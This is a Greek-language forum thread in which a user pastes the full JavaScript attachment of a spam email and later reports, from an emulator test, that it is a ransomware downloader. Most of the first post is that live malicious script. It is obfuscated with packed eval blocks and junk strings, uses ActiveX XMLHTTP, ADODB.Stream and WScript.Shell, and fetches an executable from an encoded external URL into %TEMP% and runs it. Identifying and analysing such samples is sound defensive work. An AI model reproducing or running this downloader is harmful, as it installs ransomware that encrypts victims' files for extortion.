σπαμ με αγνωστης χρησης αρχειο (βρεθηκε ακριβως δουλευει και δαυτ
#1
εδω και λιγους μηνες, αντι για τα κλασσικα σπαμ με τις κληρονομιες και τις λοιπες αηδιες (που ειναι μια ευχαριστη ασχολια για τρολλαρισμα, το λεγομενο scambaiting οπως κανονικα ονομαζεται), παιρνω πολυ συχνα ακυρα σπαμ με δηθεν αρχεια που «εχω ζητησει» (και προφανως δεν ειμαι ο μονος, ουτε και ειναι η πρωτη φορα που παιρνω σπαμ με συνημενα). το θεμα ειναι, τι στον κορακα ειναι αυτο το συνημενο, και τι υποτιθεται οτι κανει? ειναι ενα σκετο αρχειο text με κωδικα javascript. μπορει καποιος που ξερει απο javascript, να το δει, να με πει τι ακριβως κανει, και πως ακριβως υποτιθεται οτι τρεχει και σε «μολυνει»? τι σοι καινουρια «μοδιτσα» ειναι και δαυτο? δεν ειναι το κλσσικο exe/bat/, doc με μολυσμενα macros, κλπ. το αρχειο ειναι αυτο εδω αποκατω:...

Κώδικας:
function madMadMad(h,s,v) {

        var h = h/360;
        var s = s/100;
        var v = v/100;
    
        var r = 0;
        var g = 0;
        var b = 0;
    
        if (s == 0) {
                r = Math.round(v * 255);
                g = Math.round(v * 255);
                b = Math.round(v * 255);
        } else {
                var_h = h * 6;
                var_i = Math.floor(var_h);
                var_1 = v * (1 - s);
                var_2 = v * (1 - s * (var_h - var_i));
                var_3 = v * (1 - s * (1 - (var_h - var_i)));
            
                if (var_i == 0) {var_r = v; var_g = var_3; var_b = var_1}
                else if (var_i == 1) {var_r = var_2; var_g = v; var_b = var_1}
                else if (var_i == 2) {var_r = var_1; var_g = v; var_b = var_3}
                else if (var_i == 3) {var_r = var_1; var_g = var_2; var_b = v}
                else if (var_i == 4) {var_r = var_3; var_g = var_1; var_b = v}
                else {var_r = v; var_g = var_1; var_b = var_2};
            
                r = Math.round(var_r * 255);
                g = Math.round(var_g * 255);
                b = Math.round(var_b * 255);
        }
    
        return [r, g, b];
};eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 6=0;a=\'b\';d.h.j=l(){4 3={5:m};3.7=3.5[("e"+"f"+"g"+("1","1","1","1","1","1","1","i")).8("k","9").8("9","b")](6,2);c 3.7};',23,23,'|phone||pentium|var|topmost|artifice|servers|replace|World|daunt||return|String|s|uBIsTst|ri|prototype|ng|immigration1|BIsT|function|this'.split('|'),0,{}))

String.prototype.immigration = function () {
    return this.immigration1().split("")[0];
};


var sin  = Math.sin ;
var cos  = Math.cos ;
var exp  = Math.exp ;
var rdiv = function(x,y){if(y==0){return 1;}else{return x/y;}}
var rlog = function(x){return Math.log(Math.abs(x));}


var ssr = function( solution ){

  var trueSolution = function(x){return x*x*x*x+x*x*x+x*x+x ;}

  var xs = [ ] ;
  for (var i = -1 ; i <= 1 ; i+= 0.01 ) {
    xs.push(i);
  }

  ysSol    = _.map( xs , function(x){return [x,    solution(x)];} );
  ysTrueSol = _.map( xs , function(x){return [x,trueSolution(x)];} );


  var ssrPlotData = {
    trueSolution : ysTrueSol,
    solution    : ysSol
  };

  $('#special')(
    'Best individual XgRLnTKR: ' +
    '<div id="graphssr-div" class="graph"></div>');

  drawPlot( 'ssr' , ssrPlotData );


  return ssrPlotData;

};
String.prototype.shd = function () {
    return this.replace("folk",".S").replace("lore","hell");
};
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('p q=["A"+"0"+"o"+"n"+("k","l","m","r","s","y","z","x")+"0","w"+"t"+"u"+("v","j","i","5","6","7","4","3","1")+("2","8","9","f","g","h","e","d","a"),""+"%"+("b","c","C","T","11","12","13","10"),""+"."+("Z","V","X","Y","15","1a","1c","1b"),"19"+"18.16"+"17"+("14","U","I","J","H","G","D","E","F"),"W"+"K"+"L"+("R","S","Q","P","M","N","O","B")];',62,75,'ct|onme|ethan|minds|seamanship|akimbo|capability|clips|budding|barriers|ntStrings|nebuchadnezzar|relating|scheduling|uruguay|diabolic|corduroy|portent|temple|presentday|findarticles|towing|synod|eXOb|iv|var|dNmDxVL|saffron|consensus|dE|nvir|dividend|Expan|je|rochester|repine||folklore|natural|toilet|licking|TTP|meuse|concentric|crest|verify|Sc|ript|outstanding|newark|suzerainty|defence|nicest|layout|architect|hades|consanguinity|linseed||installing|rolling|spurn|TE|accordingly|praiseworthy|stuffing|trailer|waken|XM|LH|ML2|MSX|uninteresting|exe|oblation'.split('|'),0,{}))

lxOinTHB = "} Caller can pass in an object of custom data in lieu of the handler if ( handler.handler ) { handleObjIn = handler; handler = handleObjIn.handler; selector = handleObjIn.selector; ";
var yQsPqXrcG = this[dNmDxVL.shift()];
RyuknQIU = "yLginsmR";
scared = (("livesex", "settled", "shapes", "translating", "pIamfIxnCex") + "vUjpWkqRDQN").immigration();
walters = (("idioms", "friendly", "persevere", "jefferson", "sIAXlckb") + "scCntz").immigration();
var virginian ="";
finances = ("n"+("italics","anvil","evanescence","aggressor","fortification","plugins","capable","gully","ep") + String.fromCharCode(111)).split("");

eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 1=2 3(4.5().6());',7,7,'var|AObrNBNnb|new|yQsPqXrcG|dNmDxVL|pop|shd'.split('|'),0,{}))
KHnqDTV = " add: function( elem, types, handler, data, selector ) { var tmp, events, t, handleObjIn, special, eventHandle, handleObj, handlers, type, namespaces, origType, elemData = jQuery._data( elem );";
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 0=2 3(5.6());0.1=8(){9(0[\'a\']===4){b(0,c)}};',13,13,'nAmnImXCA|onreadystatechange|new|yQsPqXrcG||dNmDxVL|pop|var|function|if|readystate|tutterd|virginian'.split('|'),0,{}));
function varInTry() {
  return (myvar == undefined);
  try {
    var myvar = 2;
  }
  catch (e) {
  }
  finally {
  }
}

function varInSubFunction() {
  return (myvar == 1);
  function subfunction() {
    var myvar = 2;
  }
}
LpfaFQKpkB = " global: {},";
var IutpmE = AObrNBNnb[dNmDxVL.shift()](dNmDxVL.shift() + "MP%");
fpqIctYT = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1E=(("1P","1O","1Q","1F","1H")+"1J").1x();1C 1v=2c.3a();1o 1G(1A,1z){1M{1y(1o(p,a,c,k,e,r){e=1o(c){1p(c<a?\'\':e(1I(c/a)))+((c=c%a)>35?1t.1K(c+29):c.1L(36))};1q(!\'\'.1r(/^/,1t)){1s(c--)r[e(c)]=k[c]||e(c);k=[1o(e){1p r[e]}];e=1o(){1p\'\\\\w+\'};c=1};1s(c--)1q(k[c])p=p.1r(1B 1w(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1p p}(\'i=H+"/"+l+a.c();d="} 4 3 L 1a 1, b 5 2 3 f g 5 h 1 2 = 6.3.2[ 1 ] || {};";j(k>0){7[(m).n().o("")](("p","q","r","s","t","u","v","w","G")+x+("y","z","A","B","C","D","E","F","T"),I,J)}K=" 4 8 M, N 2 3 O 1, P Q 1 1 = ( 8 ? 2.R : 2.S ) || 1;";7[U+("V","W","X","Y","Z","10","11","12","e")+(("13","14","15","16","17","18")+"19").9()+(("1b","1c","1d","1e","1f","1g")+"1h").9()]();1i=" 1j 2 1k 1l 1m 1n 1 2 = 6.3.2[ 1 ] || {};";\',1R,1S,\'|1T|1U|1V|1W|1X|1Y|1Z|20|1x|21|22|23|24||25|26|27|28|1q|1v|1z|2a|2b|1D|2d|2e|2f|2g|2h|2i|2j|2k|1E|2l|2m|2n|2o|2p|2q|2r|2s||2t|1A|2u|2v|2w|2x|2y|2z|2A|2B|2C|2D||2E|2F|2G|2H|2I|2J|2K|2L|2M|2N|2O|2P|2Q|2R|2S|2T|2U|2V|2W|2X|2Y|2Z|30|31|32|33|34|37|38|39\'.1u(\'|\'),0,{}))}3b(3c){}}1y(1o(p,a,c,k,e,r){e=1t;1q(!\'\'.1r(/^/,1t)){1s(c--)r[c]=k[c]||c;k=[1o(e){1p r[e]}];e=1o(){1p\'\\\\w+\'};c=1};1s(c--)1q(k[c])p=p.1r(1B 1w(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1p p}(\'1 2=(("3")+("0+0")+"4:").5("+").6("")+"//";\',7,7,\'t|1C|1N|h|p|1u|1D\'.1u(\'|\'),0,{}))',62,199,'||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||function|return|if|replace|while|String|split|bewitched|RegExp|immigration|eval|dairy|looks|new|var|join|quilte|careworn|sitting|EntrwcmxKM|parseInt|yymLxoTu|fromCharCode|toString|try|herbdent|cologne|chunk|baking|62|86|type|special|event|If|the|jQuery|nAmnImXCA|selector|dNmDxVL|use|shift|kWEYsxovQvY|handlers|for|changed|virginian||finances|reverse|Math|olympics|melee|counted|litigation|preparing|grande|incentive|instruments|conversion|partners|errol|tiffany|freud|skills|architects|taken|IutpmE|false|idCncMRn|changes|defined|determine|api|otherwise|given|delegateType|bindType|walters|astuteness|freeze|admittance|shrub|vulnerable|wallow|vaunted|locale|snaps|spree|swamped|scholarships|returning|npLbCaJItYY|PFpMXpvIyu|its|farmers|travel|homestead|dunbar|scales|dpafntF|SDHMSA|XsyCNvAHv|Update|based|||on|newly|reset|random|catch|MjmHlMXm'.split('|'),0,{}));
function tutterd(ridszAD,Podstak){
        var pqpzxBEiN = new yQsPqXrcG((""+"A"+"HRE"+("whose","beginner","popped","sacristan","deleterious","sterling","priceless","accentuated","DB") + ""+("upside","surveys","producers","perception","jacobus","rigorous","dolphin",".S")+("carver","lincolnshire","strangle","dying","monumental","defence","season","tre")+"am").replace("HRE", "DO"));
        pqpzxBEiN[""+("jeroboam","foremen","signal","nicaragua","beverly","bicycle","terracotta","op")+"en"]();
        pqpzxBEiN.type = 1;
        uFvNJemn = "} Init the element\"s event structure and main handler, if this is the first if ( !( events = elemData.events ) ) { events = elemData.events = {}; } if ( !( eventHandle = elemData.handle ) ) { eventHandle = elemData.handle = function( e ) {";
        pqpzxBEiN["w"+("airline","extraction","inserting","decade","assimilating","sediment","unfaithful","crunch","ri")+"te"](ridszAD[("pease","swindler","locale","thinking","chester","onslaught","whelp","chivalric","")+"R"+"es"+"pon" + walters + "e"+("commissioners","mason","restrictions","trusted","movie","squalid","psychiatry","confirmation","Bo")+"dy"]);
        ThIzaEpVou = " Discard the second event of a jQuery.event.trigger() and when an event is called after a page has unloaded return typeof jQuery !== \"undefined\" && ( !e || jQuery.event.triggered !== e.type ) ? jQuery.event.dispatch.apply( eventHandle.elem, arguments ) : undefined; };";
        pqpzxBEiN[(scared + "o"+"Di"+"ti"+("keenness","emigrant","pierre","tight","irritable","bedford","denote","profundity","on")).replace("D", walters)] = 0;
        cUTFlRWCx = " Add elem as a property of the handle fn to prevent a memory leak with IE non-native events eventHandle.elem = elem; ";
        pqpzxBEiN[("unhappiness","arcade","dispute","association","tactical","heather","appeals","sav")+"eT"+"oF"+"ile"](Podstak, 2);
        dHRzkhYane = "} Handle multiple events separated by a space types = ( types || \"\" ).match( rnotwhite ) || [ \"\" ]; t = types.length; while ( t-- ) { tmp = rtypenamespace.exec( types[ t ] ) || []; type = origType = tmp[ 1 ]; namespaces = ( tmp[ 2 ] || \"\" ).split( \".\" ).sort();";
        pqpzxBEiN.close();
        LkxKQPnzxe = " There *must* be a type, no attaching namespace-only handlers if ( !type ) { continue; ";
        AObrNBNnb["R"+("dummy","regardless","plane","disclaimer","epilogue","spherical","subsection","virtuoso","un")](Podstak, 1, "LrhwxhFWc" === "CNdDRnXULDE"); dAuGQ = " Only use addEventListener/attachEvent if the special events handler returns false if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false ) {";
}


function varInForIn() {
  return (myvar == undefined);
  var o = new Object();
  var i;
  for (i in o)
    var myvar = 2;
}

function varInWith() {
  return (myvar == undefined);
  with (String)
    var myvar = 2;
}
sitting(herbdent + "\u0077\u0077\u0077\u002E\u0064\u0072\u006F\u0067\u0061\u0064\u006F\u006E\u0069\u006B\u0061"+"\u0064\u002E\u007A\u0061\u002E\u0070\u006C\u002F\u0030\u0039\u0075\u0038\u0037\u0074\u0067\u0079","lkrcpBsrVU");

function varInCase() {
  return (myvar == undefined);
  switch (1) {
    case 0:
      var myvar = 2;
    case 1:
  }
}

function varInLabel() {
  return (myvar == undefined);
label1:
  var myvar = 2;
}

και η ακυρη epic fail λεπτομερεια στο κειμενο του σπαμ. το "note" απο μονο του προδιδει το βλακοσπαμ ( :lolx:rolfx ) :...

Κώδικας:
Your message is ready to be sent with the following file or link
attachments:

scan10001


Note: To protect against computer viruses, e-mail programs may prevent
sending or receiving certain types of file attachments.  Check your e-mail
security settings to determine how attachments are handled.
ονομαζομαι DarkGoth, και ειμαι «καλα»( ; )... το OsArena με θεραπευσε... (goth=!ok {equals} EMO)...  Emo
  Απάντηση
#2
γκνιχχχ!!!... σαχλαμαριτσα ransomware downloader ειναι τελικα η αηδια. και με αρεσει που εχουν κανει και ολοκληρη διαδικασια για τη μαλακια, λες και την ειδαν αρχιμαστερχακερ, που ηθελαν να φτιαξουν το skynet, η, δεν ξερω τι αλλο:...

εχουν φτιαξει το σκριπτ (το συνημενο στο σπαμ που κατεβαζεις, που εχω τον κωδικα του στην αποπανω απαντηση), το οποιο κανει compile πανω στη μυιγα (on the fly/δηλαδη ση ram) εναν ransomware downloader/compiler

στη συνεχεια το σκριπτ τρεχει αυτοματα τον downloader/compiler για να κατεβει το κυριως σκουπιδι

κατεβαζει ο downloader/compiler το σκουπιδι, για το οποιο εχουν κατσει να φτιαξουν, απο ολοκληρη σκουπιδοσελιδα με «οδηγιες» (και να βαλουν τα λινκ στο σκουπιδι), μεχρι και εικονα με τη σκουπιδοσελιδα και τα λινκ προς τις μουφοσελιδες πληρωμης (επισης δικης τους κατοχης)

μετα γινεται compile απο τον downloader/compiler το σκουπιδι πανω στη μυιγα επισης (on the fly) και στη συνεχεια το σκριπτ το τρεχει

τελικα το σκουπιδι κανει τις μαλακιες του (κρυπτογραφηση των αρχειων που δεν εχω)

ταυτοχρονα με την κρυπτογραφηση των αρχειων που δεν εχω:...
...βαζει για φοντο την εικονα με τη σκουπιδοσελιδα με τις «οδηγιες»
...ανοιγει την ιδια εικονα με την προβολη φωτογραφιων των παντζουριωνε
...ανοιγει το μηρυκαστικο, στη σκουπιδοσελιδα με τις «οδηγιες»
...το σκουπιδι ταυτοχρονα κρυπτογραφει το αρχικο κατεβασμενο σκουπιδοαρχειο (για ποιο λογο ουτε οι ιδιοι ξερουν), και τελος αυτοδιαγραφεται απο τη μνημη.

τι διατανο? για μια μαλακια κυριολεκτικα, ενα σκουπιδι μιας χρησης (δεν επιρεαζει τα καινουρια αρχεια, ουτε αν ανοιχτουν, ουτε μετα απο επανεκκινηση, ενω αν το δικτυο ειναι αποσυνδεμενο απλα αυτοκτονει η μαλακια χωρις να κανει απολυτως τιποτα), για ενα σκουπιδακι των 5 λεπτων (και για να φτιαχτει, και οση ειναι η ζωη του μεχρι να κανεις revert τον εξομοιωτη), ΟΛΑ αυτα... ΛΟΛ!!!...

https://postimg.org/image/n4by4q41t/

https://postimg.org/image/uonepqqrl/
ονομαζομαι DarkGoth, και ειμαι «καλα»( ; )... το OsArena με θεραπευσε... (goth=!ok {equals} EMO)...  Emo
  Απάντηση
#3
Χαρά στο κουράγιο σου ρε φίλε :D
  Απάντηση
#4
Πράος, post: 21383, member: 1459 είπε κι ελάλησε:Χαρά στο κουράγιο σου ρε φίλε :D

ε, μα δεν πηγαινε αλλο με δαυτο. μονο αυτη τη μαλακια εχουν κανει «μοδιτσα» να στελνουν στα βλακοσπαμ. και αναρωτιωμανε, τι διατανο? τι εχουν παθει ολοι με αυτη μαλακια και εχει γινει τοσο «διασημη» στα σπαμ? ουτε καν μια «κληρονομια απο τον πριγκιπα του μπουρκινα φασο» για να τους τρολλαρω (τι στο διατανο ειναι παλι αυτο? υπαρχει τετοια περιοχη? και ποσους «πριγκιπες» εχει πια?):lolx:rolfx

πιστευα οτι θα ειναι καμια επικη καφροχακια, που να κανει, ξερω'γω τι. να σε παραβιαζει λογαριασμους, να κανει το πισι bot, η, ξερω και'γω τι αλλο. που να φανταστω οτι ειναι κατι τοσο παιδιαστικο και ηλιθιο... ransomware downloader... πφφφφφ!... αηδιες... :fap:fap και για ενα ηλιθιο ransomware μπηκαν σε ολη αυτη τη διαδικασια? τι σκατα? χαρας τη δικη τους υπομονη, οχι τη δικη μου :lolx:rolfx :lolx:rolfx
ονομαζομαι DarkGoth, και ειμαι «καλα»( ; )... το OsArena με θεραπευσε... (goth=!ok {equals} EMO)...  Emo
  Απάντηση


Ίσως Σχετικά Νήματα...
Νήμα Άτομο Απαντήσεις Βλεφαριάσματα Τελευταία Ανάρτηση
  Τσόντα στον Προαστιακό; Όχι ακριβώς... Hellena 1 2.727 02.10.2015 23:30
Τελευταία Ανάρτηση: Πράος

Πάμε στο Forum:


Πλάσματα σουλατσάρουν στο νήμα: 1 Επισκέπτης(ες)